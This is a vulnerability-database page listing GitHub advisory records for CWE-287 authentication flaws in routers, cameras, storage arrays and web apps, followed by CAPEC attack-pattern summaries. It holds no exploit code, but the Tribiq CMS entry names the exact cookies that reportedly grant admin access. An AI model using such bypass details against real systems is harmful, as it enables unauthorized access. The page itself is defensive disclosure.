Vulnerability from github – Published: 2022-04-01 00:00 – Updated: 2022-04-09 00:00Improper access control vulnerability in ELECOM LAN routers (WRC-1167GST2 firmware v1.25 and prior, WRC-1167GST2A firmware v1.25 and prior, WRC-1167GST2H firmware v1.25 and prior, WRC-2533GS2-B firmware v1.52 and prior, WRC-2533GS2-W firmware v1.52 and prior, WRC-1750GS firmware v1.03 and prior, WRC-1750GSV firmware v2.11 and prior, WRC-1900GST firmware v1.03 and prior, WRC-2533GST firmware v1.03 and prior, WRC-2533GSTA firmware v1.03 and prior, WRC-2533GST2 firmware v1.25 and prior, WRC-2533GST2SP firmware v1.25 and prior, WRC-2533GST2-G firmware v1.25 and prior, and EDWRC-2533GST2 firmware v1.25 and prior) allows a network-adjacent authenticated attacker to bypass access restriction and to access the management screen of the product via unspecified vectors.
{
"affected": [],
"aliases": [
"CVE-2022-25915"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-03-31T09:15:00Z",
"severity": "HIGH"
},
"details": "Improper access control vulnerability in ELECOM LAN routers (WRC-1167GST2 firmware v1.25 and prior, WRC-1167GST2A firmware v1.25 and prior, WRC-1167GST2H firmware v1.25 and prior, WRC-2533GS2-B firmware v1.52 and prior, WRC-2533GS2-W firmware v1.52 and prior, WRC-1750GS firmware v1.03 and prior, WRC-1750GSV firmware v2.11 and prior, WRC-1900GST firmware v1.03 and prior, WRC-2533GST firmware v1.03 and prior, WRC-2533GSTA firmware v1.03 and prior, WRC-2533GST2 firmware v1.25 and prior, WRC-2533GST2SP firmware v1.25 and prior, WRC-2533GST2-G firmware v1.25 and prior, and EDWRC-2533GST2 firmware v1.25 and prior) allows a network-adjacent authenticated attacker to bypass access restriction and to access the management screen of the product via unspecified vectors.",
"id": "GHSA-wvw9-v86g-f237",
"modified": "2022-04-09T00:00:51Z",
"published": "2022-04-01T00:00:41Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25915"
},
{
"type": "WEB",
"url": "https://jvn.jp/en/jp/JVN88993473"
},
{
"type": "WEB",
"url": "https://www.elecom.co.jp/news/security/20211130-01"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WW64-XCQM-5JHF
Vulnerability from github – Published: 2024-09-23 18:30 – Updated: 2024-09-23 18:30A condition exists in FlashArray Purity whereby an attacker can employ a privileged account allowing remote access to the array.
{
"affected": [],
"aliases": [
"CVE-2024-0002"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-09-23T18:15:04Z",
"severity": "CRITICAL"
},
"details": "A condition exists in FlashArray Purity whereby an attacker can employ a privileged account allowing remote access to the array.",
"id": "GHSA-ww64-xcqm-5jhf",
"modified": "2024-09-23T18:30:35Z",
"published": "2024-09-23T18:30:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0002"
},
{
"type": "WEB",
"url": "https://purestorage.com/security"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WW6R-JV53-52XQ
Vulnerability from github – Published: 2024-08-07 06:31 – Updated: 2024-08-07 06:31An insufficient authorization vulnerability in web component of EPMM prior to 12.1.0.1 allows an unauthorized attacker within the network to execute arbitrary commands on the underlying operating system of the appliance.
{
"affected": [],
"aliases": [
"CVE-2024-36130"
],
"database_specific": {
"cwe_ids": [
"CWE-285",
"CWE-287"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-08-07T04:17:17Z",
"severity": "CRITICAL"
},
"details": "An insufficient authorization vulnerability in web component of EPMM prior to 12.1.0.1 allows an unauthorized attacker within the network to execute arbitrary commands on the underlying operating system of the appliance.",
"id": "GHSA-ww6r-jv53-52xq",
"modified": "2024-08-07T06:31:09Z",
"published": "2024-08-07T06:31:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36130"
},
{
"type": "WEB",
"url": "https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-for-Mobile-EPMM-July-2024"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WWFH-WCFQ-86Q2
Vulnerability from github – Published: 2022-05-13 01:36 – Updated: 2022-05-13 01:36An Improper Authentication issue was discovered in ABB VSN300 WiFi Logger Card versions 1.8.15 and prior, and VSN300 WiFi Logger Card for React versions 2.1.3 and prior. By accessing a specific uniform resource locator (URL) on the web server, a malicious user is able to access internal information about status and connected devices without authenticating.
{
"affected": [],
"aliases": [
"CVE-2017-7920"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-08-07T08:29:00Z",
"severity": "HIGH"
},
"details": "An Improper Authentication issue was discovered in ABB VSN300 WiFi Logger Card versions 1.8.15 and prior, and VSN300 WiFi Logger Card for React versions 2.1.3 and prior. By accessing a specific uniform resource locator (URL) on the web server, a malicious user is able to access internal information about status and connected devices without authenticating.",
"id": "GHSA-wwfh-wcfq-86q2",
"modified": "2022-05-13T01:36:14Z",
"published": "2022-05-13T01:36:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7920"
},
{
"type": "WEB",
"url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-192-03"
},
{
"type": "WEB",
"url": "http://search.abb.com/library/Download.aspx?DocumentID=9AKK107045A1977\u0026LanguageCode=en\u0026DocumentPartId=\u0026Action=Launch"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/99558"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WWHW-V77G-VR64
Vulnerability from github – Published: 2022-05-17 00:38 – Updated: 2022-05-17 00:38** DISPUTED ** Tribiq CMS 5.0.9a beta allows remote attackers to bypass authentication and gain administrative access by setting the COOKIE_LAST_ADMIN_USER and COOKIE_LAST_ADMIN_LANG cookies. NOTE: a third party reports that the vendor disputes the existence of this issue.
{
"affected": [],
"aliases": [
"CVE-2008-6804"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2009-05-11T20:30:00Z",
"severity": "HIGH"
},
"details": "** DISPUTED ** Tribiq CMS 5.0.9a beta allows remote attackers to bypass authentication and gain administrative access by setting the COOKIE_LAST_ADMIN_USER and COOKIE_LAST_ADMIN_LANG cookies. NOTE: a third party reports that the vendor disputes the existence of this issue.",
"id": "GHSA-wwhw-v77g-vr64",
"modified": "2022-05-17T00:38:12Z",
"published": "2022-05-17T00:38:12Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2008-6804"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/46237"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/6886"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/32001"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-WWJX-6RFC-2QJH
Vulnerability from github – Published: 2022-05-24 17:13 – Updated: 2022-05-24 17:13CACAGOO Cloud Storage Intelligent Camera TV-288ZD-2MP with firmware 3.4.2.0919 has weak authentication of TELNET access, leading to root privileges without any password required.
{
"affected": [],
"aliases": [
"CVE-2020-6852"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-04-02T15:15:00Z",
"severity": "HIGH"
},
"details": "CACAGOO Cloud Storage Intelligent Camera TV-288ZD-2MP with firmware 3.4.2.0919 has weak authentication of TELNET access, leading to root privileges without any password required.",
"id": "GHSA-wwjx-6rfc-2qjh",
"modified": "2022-05-24T17:13:19Z",
"published": "2022-05-24T17:13:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-6852"
},
{
"type": "WEB",
"url": "https://insights.oem.avira.com/serious-security-flaws-uncovered-in-cacagoo-ip-cameras"
},
{
"type": "WEB",
"url": "https://www.cacagoo.com"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-WWMP-583H-V424
Vulnerability from github – Published: 2022-05-24 17:46 – Updated: 2022-05-24 17:46Mitake smart stock selection system contains a broken authentication vulnerability. By manipulating the parameters in the URL, remote attackers can gain the privileged permissions to access transaction record, and fraudulent trading without login.
{
"affected": [],
"aliases": [
"CVE-2021-28174"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-04-08T04:15:00Z",
"severity": "MODERATE"
},
"details": "Mitake smart stock selection system contains a broken authentication vulnerability. By manipulating the parameters in the URL, remote attackers can gain the privileged permissions to access transaction record, and fraudulent trading without login.",
"id": "GHSA-wwmp-583h-v424",
"modified": "2022-05-24T17:46:53Z",
"published": "2022-05-24T17:46:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28174"
},
{
"type": "WEB",
"url": "https://www.twcert.org.tw/tw/cp-132-4625-4ccc6-1.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-WWRW-XCHG-GFW3
Vulnerability from github – Published: 2022-05-17 01:42 – Updated: 2022-05-17 01:42The Baseboard Management Controller (BMC) in Cisco Unified Computing System (UCS) does not properly handle SSH escape sequences, which allows remote authenticated users to bypass an unspecified authentication step via SSH port forwarding, aka Bug ID CSCtg17656.
{
"affected": [],
"aliases": [
"CVE-2012-4078"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2013-09-24T10:35:00Z",
"severity": "HIGH"
},
"details": "The Baseboard Management Controller (BMC) in Cisco Unified Computing System (UCS) does not properly handle SSH escape sequences, which allows remote authenticated users to bypass an unspecified authentication step via SSH port forwarding, aka Bug ID CSCtg17656.",
"id": "GHSA-wwrw-xchg-gfw3",
"modified": "2022-05-17T01:42:44Z",
"published": "2022-05-17T01:42:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2012-4078"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/87367"
},
{
"type": "WEB",
"url": "http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2012-4078"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1029084"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-WWW3-95VV-VGX8
Vulnerability from github – Published: 2022-05-17 02:58 – Updated: 2022-05-17 02:58An issue was discovered in Moxa NPort 5110 versions prior to 2.6, NPort 5130/5150 Series versions prior to 3.6, NPort 5200 Series versions prior to 2.8, NPort 5400 Series versions prior to 3.11, NPort 5600 Series versions prior to 3.7, NPort 5100A Series & NPort P5150A versions prior to 1.3, NPort 5200A Series versions prior to 1.3, NPort 5150AI-M12 Series versions prior to 1.2, NPort 5250AI-M12 Series versions prior to 1.2, NPort 5450AI-M12 Series versions prior to 1.2, NPort 5600-8-DT Series versions prior to 2.4, NPort 5600-8-DTL Series versions prior to 2.4, NPort 6x50 Series versions prior to 1.13.11, NPort IA5450A versions prior to v1.4. Administration passwords can be retried without authenticating.
{
"affected": [],
"aliases": [
"CVE-2016-9361"
],
"database_specific": {
"cwe_ids": [
"CWE-287",
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-02-13T21:59:00Z",
"severity": "CRITICAL"
},
"details": "An issue was discovered in Moxa NPort 5110 versions prior to 2.6, NPort 5130/5150 Series versions prior to 3.6, NPort 5200 Series versions prior to 2.8, NPort 5400 Series versions prior to 3.11, NPort 5600 Series versions prior to 3.7, NPort 5100A Series \u0026 NPort P5150A versions prior to 1.3, NPort 5200A Series versions prior to 1.3, NPort 5150AI-M12 Series versions prior to 1.2, NPort 5250AI-M12 Series versions prior to 1.2, NPort 5450AI-M12 Series versions prior to 1.2, NPort 5600-8-DT Series versions prior to 2.4, NPort 5600-8-DTL Series versions prior to 2.4, NPort 6x50 Series versions prior to 1.13.11, NPort IA5450A versions prior to v1.4. Administration passwords can be retried without authenticating.",
"id": "GHSA-www3-95vv-vgx8",
"modified": "2022-05-17T02:58:45Z",
"published": "2022-05-17T02:58:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-9361"
},
{
"type": "WEB",
"url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-336-02"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/85965"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
Strategy: Libraries or Frameworks
Use an authentication framework or library such as the OWASP ESAPI Authentication feature.
CAPEC-114: Authentication Abuse
An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker.
CAPEC-115: Authentication Bypass
An attacker gains access to application, service, or device with the privileges of an authorized or privileged user by evading or circumventing an authentication mechanism. The attacker is therefore able to access protected data without authentication ever having taken place.
CAPEC-151: Identity Spoofing
Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principle or use stolen / spoofed authentication credentials.
CAPEC-194: Fake the Source of Data
An adversary takes advantage of improper authentication to provide data or services under a falsified identity. The purpose of using the falsified identity may be to prevent traceability of the provided data or to assume the rights granted to another individual. One of the simplest forms of this attack would be the creation of an email message with a modified "From" field in order to appear that the message was sent from someone other than the actual sender. The root of the attack (in this case the email system) fails to properly authenticate the source and this results in the reader incorrectly performing the instructed action. Results of the attack vary depending on the details of the attack, but common results include privilege escalation, obfuscation of other attacks, and data corruption/manipulation.
CAPEC-22: Exploiting Trust in Client
An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
CAPEC-57: Utilizing REST's Trust in the System Resource to Obtain Sensitive Data
This attack utilizes a REST(REpresentational State Transfer)-style applications' trust in the system resources and environment to obtain sensitive data once SSL is terminated.
CAPEC-593: Session Hijacking
This type of attack involves an adversary that exploits weaknesses in an application's use of sessions in performing authentication. The adversary is able to steal or manipulate an active session and use it to gain unathorized access to the application.
CAPEC-633: Token Impersonation
An adversary exploits a weakness in authentication to create an access token (or equivalent) that impersonates a different entity, and then associates a process/thread to that that impersonated token. This action causes a downstream user to make a decision or take action that is based on the assumed identity, and not the response that blocks the adversary.
CAPEC-650: Upload a Web Shell to a Web Server
By exploiting insufficient permissions, it is possible to upload a web shell to a web server in such a way that it can be executed remotely. This shell can have various capabilities, thereby acting as a "gateway" to the underlying web server. The shell might execute at the higher permission level of the web server, providing the ability the execute malicious code at elevated levels.
CAPEC-94: Adversary in the Middle (AiTM)
An adversary targets the communication between two components (typically client and server), in order to alter or obtain data from transactions. A general approach entails the adversary placing themself within the communication channel between the two components.